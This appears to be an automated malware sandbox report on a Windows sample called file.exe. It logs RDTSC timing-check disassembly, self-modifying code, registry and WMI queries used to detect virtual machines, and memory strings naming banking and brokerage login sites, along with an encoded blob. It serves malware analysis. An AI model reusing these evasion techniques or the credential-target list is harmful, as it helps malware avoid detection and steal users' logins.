Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B30953 second address: 4B409B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007F6268DAF3CEh 0x0000000f ret 0x00000010 nop 0x00000011 jmp 00007F6268DAF3C2h 0x00000013 and bl, 00000001h 0x00000016 movzx eax, bl 0x00000019 lea esp, dword ptr [ebp-0Ch] 0x0000001c pop esi 0x0000001d pop edi 0x0000001e pop ebx 0x0000001f pop ebp 0x00000020 ret 0x00000021 add esp, 04h 0x00000024 mov eax, dword ptr [00AB60A4h+ebx*4] 0x0000002b mov ecx, 04B3412Ah 0x00000030 xor ecx, dword ptr [00AB60ACh] 0x00000036 add eax, ecx 0x00000038 inc eax 0x00000039 jmp eax 0x0000003b push esi 0x0000003c call 00007F6268DD5598h 0x00000041 push ebp 0x00000042 push ebx 0x00000043 push edi 0x00000044 push esi 0x00000045 sub esp, 00000284h 0x0000004b mov esi, dword ptr [esp+00000298h] 0x00000052 mov dword ptr [esp+00000268h], 00AB8100h 0x0000005d mov dword ptr [esp+00000264h], 0000009Dh 0x00000068 mov dword ptr [esp], 00000000h 0x0000006f mov eax, dword ptr [00AB3D58h] 0x00000074 call eax 0x00000076 mov edi, edi 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b movzx esi, di 0x0000007e mov bl, 9Dh 0x00000080 popad 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B409B8 second address: 4B409BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B409BE second address: 4B409C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B409C2 second address: 4B409C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B409C6 second address: 4B40A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6268DAF3D1h 0x00000012 or ecx, 3415F796h 0x00000018 jmp 00007F6268DAF3D1h 0x0000001d popfd 0x0000001e mov bx, cx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40A00 second address: 4B40A65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007F626941E964h 0x0000000c sbb ah, FFFFFFE8h 0x0000000f jmp 00007F626941E95Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c push eax 0x0000001d mov bx, 2A56h 0x00000021 pop ebx 0x00000022 call 00007F626941E95Ch 0x00000027 mov cx, 33E1h 0x0000002b pop esi 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F626941E968h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40A65 second address: 4B40A6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40A6B second address: 4B40A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40B04 second address: 4B40B5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6268DAF3CFh 0x00000009 and cx, B9BEh 0x0000000e jmp 00007F6268DAF3D9h 0x00000013 popfd 0x00000014 mov ax, DB07h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push 05EFBE75h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007F6268DAF3D4h 0x00000028 mov ecx, 11B3F801h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40B5F second address: 4B40BC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 8E00h 0x00000007 mov si, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 7045225Dh 0x00000014 pushad 0x00000015 call 00007F626941E961h 0x0000001a pop ebx 0x0000001b popad 0x0000001c call 00007F62DA333941h 0x00000021 push 75A52B70h 0x00000026 push dword ptr fs:[00000000h] 0x0000002d mov eax, dword ptr [esp+10h] 0x00000031 mov dword ptr [esp+10h], ebp 0x00000035 lea ebp, dword ptr [esp+10h] 0x00000039 sub esp, eax 0x0000003b push ebx 0x0000003c push esi 0x0000003d push edi 0x0000003e mov eax, dword ptr [75AB4538h] 0x00000043 xor dword ptr [ebp-04h], eax 0x00000046 xor eax, ebp 0x00000048 push eax 0x00000049 mov dword ptr [ebp-18h], esp 0x0000004c push dword ptr [ebp-08h] 0x0000004f mov eax, dword ptr [ebp-04h] 0x00000052 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000059 mov dword ptr [ebp-08h], eax 0x0000005c lea eax, dword ptr [ebp-10h] 0x0000005f mov dword ptr fs:[00000000h], eax 0x00000065 ret 0x00000066 jmp 00007F626941E969h 0x0000006b sub esi, esi 0x0000006d jmp 00007F626941E967h 0x00000072 mov dword ptr [ebp-1Ch], esi 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40BC6 second address: 4B40BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6268DAF3D1h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40BDC second address: 4B40BE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40BE2 second address: 4B40BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50914 second address: 4B50918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50918 second address: 4B50935 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50935 second address: 4B50962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F626941E963h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50962 second address: 4B50966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50966 second address: 4B5096C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5096C second address: 4B509C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, ECh 0x00000005 pushfd 0x00000006 jmp 00007F6268DAF3D7h 0x0000000b sbb cl, 0000001Eh 0x0000000e jmp 00007F6268DAF3D9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F6268DAF3CEh 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B509C0 second address: 4B509C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B509C4 second address: 4B509CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B509CA second address: 4B509CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B509CF second address: 4B509EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 jmp 00007F6268DAF3CAh 0x0000000d mov dword ptr [esp], esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B509EA second address: 4B50A07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50A07 second address: 4B50A2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6268DAF3CDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50A2E second address: 4B50A34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50A34 second address: 4B50A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50A38 second address: 4B50A7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F626941E967h 0x00000013 sub ecx, 603AB1AEh 0x00000019 jmp 00007F626941E969h 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50A7D second address: 4B50AF8 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007F62D9CACCF8h 0x0000000e jmp 00007F6268DAF3D3h 0x00000013 cmp dword ptr [75AB459Ch], 05h 0x0000001a pushad 0x0000001b jmp 00007F6268DAF3D4h 0x00000020 push eax 0x00000021 mov cx, dx 0x00000024 pop edi 0x00000025 popad 0x00000026 je 00007F62D9CC4D9Dh 0x0000002c jmp 00007F6268DAF3D8h 0x00000031 xchg eax, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F6268DAF3D7h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50BBE second address: 4B50C8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F626941E95Fh 0x00000009 or ch, 0000006Eh 0x0000000c jmp 00007F626941E969h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F626941E960h 0x00000018 add esi, 64047AE8h 0x0000001e jmp 00007F626941E95Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 pop esi 0x00000028 pushad 0x00000029 pushad 0x0000002a mov esi, 170A6071h 0x0000002f pushfd 0x00000030 jmp 00007F626941E95Eh 0x00000035 sbb ecx, 31B78D48h 0x0000003b jmp 00007F626941E95Bh 0x00000040 popfd 0x00000041 popad 0x00000042 jmp 00007F626941E968h 0x00000047 popad 0x00000048 pop ebp 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c movsx ebx, cx 0x0000004f pushfd 0x00000050 jmp 00007F626941E966h 0x00000055 jmp 00007F626941E965h 0x0000005a popfd 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F978A5 second address: 5F978C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007F6268DAF3CCh 0x0000000d jne 00007F6268DAF3C6h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F978C0 second address: 5F978DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E969h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F8FD66 second address: 5F8FD91 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6268DAF3C6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F6268DAF3C8h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6268DAF3D3h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F8FD91 second address: 5F8FDAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F626941E956h 0x00000010 jmp 00007F626941E95Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F8FDAF second address: 5F8FDB9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6268DAF3C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F971B8 second address: 5F971C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F9893A second address: 5E1FB1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F6268DAF3C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 57BE1E1Bh 0x00000015 mov dword ptr [ebp+122D2C9Dh], ecx 0x0000001b push dword ptr [ebp+122D0BD9h] 0x00000021 movsx esi, dx 0x00000024 call dword ptr [ebp+122D1A63h] 0x0000002a pushad 0x0000002b add dword ptr [ebp+122D1B47h], ebx 0x00000031 xor eax, eax 0x00000033 mov dword ptr [ebp+122D1C6Bh], edx 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d jmp 00007F6268DAF3D3h 0x00000042 mov dword ptr [ebp+122D36CAh], eax 0x00000048 stc 0x00000049 stc 0x0000004a mov esi, 0000003Ch 0x0000004f jmp 00007F6268DAF3D2h 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 add dword ptr [ebp+122D1AE6h], edx 0x0000005e lodsw 0x00000060 or dword ptr [ebp+122D1AE6h], eax 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a jmp 00007F6268DAF3D7h 0x0000006f jmp 00007F6268DAF3D3h 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 mov dword ptr [ebp+122D1B6Ah], eax 0x0000007e push eax 0x0000007f push ebx 0x00000080 push esi 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F98A60 second address: 5F98A8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E966h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F626941E960h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F98A8E second address: 5F98A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6268DAF3C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F98D25 second address: 5F98D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 654335BFh 0x0000000d mov dword ptr [ebp+122D1AA3h], edx 0x00000013 mov dword ptr [ebp+122D1B1Eh], ecx 0x00000019 lea ebx, dword ptr [ebp+1244C894h] 0x0000001f js 00007F626941E957h 0x00000025 xchg eax, ebx 0x00000026 push edi 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a pop edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F98D51 second address: 5F98D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FB97F4 second address: 5FB97FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FB97FA second address: 5FB980B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6268DAF3CAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FB980B second address: 5FB9811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F8C726 second address: 5F8C73B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FB76DA second address: 5FB76DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FB79AC second address: 5FB79C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007F6268DAF3CBh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FB79C3 second address: 5FB79E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F626941E956h 0x00000009 jmp 00007F626941E965h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FB79E3 second address: 5FB7A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007F6268DAF3EDh 0x0000000d jmp 00007F6268DAF3D9h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FB7A0D second address: 5FB7A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FB7DF5 second address: 5FB7DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FB7DF9 second address: 5FB7E04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FB7E04 second address: 5FB7E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6268DAF3C6h 0x0000000a ja 00007F6268DAF3C6h 0x00000010 jmp 00007F6268DAF3CCh 0x00000015 popad 0x00000016 jmp 00007F6268DAF3CFh 0x0000001b js 00007F6268DAF3C8h 0x00000021 push eax 0x00000022 push edx 0x00000023 jp 00007F6268DAF3C6h 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FB7F99 second address: 5FB7FAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F626941E956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007F626941E956h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: ACBA30 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: CE8D5C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5E1FB6E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5E1FAB3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5FC23E0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5E1D646 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5FD1D2E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 6051FFF instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 7696	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7880	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7716	Thread sleep time: -30015s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: file.exe, 00000002.00000002.1633438617.0000000000C3D000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000002.00000002.1635972942.0000000005FA1000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1632829541.0000000000748000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: file.exe, 00000002.00000003.1382825840.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 7EWdzo63NEx+QbCEQVX1cB/vJYDa5I1nyjoQEmVLXf/wCJ7Ewu5xCDEFtpgPA7FSHuI6zentg27HJFgMJlkS+PlFwoLA6ntafle0jl1X9HoU4iaP2emAbsY1GxtsQVzz/waewY6hNE9nBenAflj1ewviJs/DoJQgxz5YSyhKVPL8Dp3Kwv1/R3xMtoZFWPl2H+8piNnpn27LPxsZbgAcv/Id2pqOwXdZaXeykV4b7jIAoS+DnLbNacg9FR5iTlfy/ASbz8jkdUB3QbaAS1b+chnvIIrY5IQgjnIfCygYEs/4CZHOjNp3RnFCp8BQFeg8Hu1o15z8hm3BPAoeek5T+fUGncbF5XdHd0i7jEhf8XcQ6SOB3a7DIMcqWEsoZ0b45QmX1MmvawZmBbaMDwOxehXkJ4Hc4IxtxjYVE3pGQPj0BpnEy+t0SXpAtYhLV/48V6Evl5y2zU/XPA4YfEdC7s9Hr8HA4XNeP1r/mQ9c/TxBoSGdzuqLa8sgChlsQVP4+gSRx8Llf0xtTbiDXV/xdxPnaMGc6ZUgmHI8HnhMWenyFa/BwOFzXj9a/5kPXP08QaEngNPmjWHEPxwSZUxb/PkJks/C63tAd0a5kkFV93oZ5GjBnOmVIJhyPB1/VFm9wAaUzMn5NFcxXPGHQxupPBfsI4Pb54xjwDgWHGJIWv/4BJHKyOJ/R3BCuYNDXvx/Wa9oiMSu1SDlPBsCeQJn/PsLndSO8DpRP0K9wBcb+3se5SWF3+qJbc87ERp6Sl7x5wiQx8DjcUd/RLCORVCxMlnmMM+ErqJt0CASGHkCZ/z7C53UjvA6UT9CvcAXG/p6Fe0oic7ggnLKIBwdbExc9vgKn9DK72ZJekK/jV1esTJZ5jDPhK63VMciCRQqdVHx+wKMgtGhbQh4SfHYD1j9cRDkJ53W4oxyxzsRGWlOXfT5AIjJwed7SXJIuoRPG788Hvlo15zPgG/SMQlRXUNc8fIT2t2A9jRPcwXpwE5X/X0W5yKH3++fac86FxppQ1b+/xeIwsL9eEJ5SryMDxWxewGhcM/27ZljynAtEGZOVem1GtTbjuh4CCc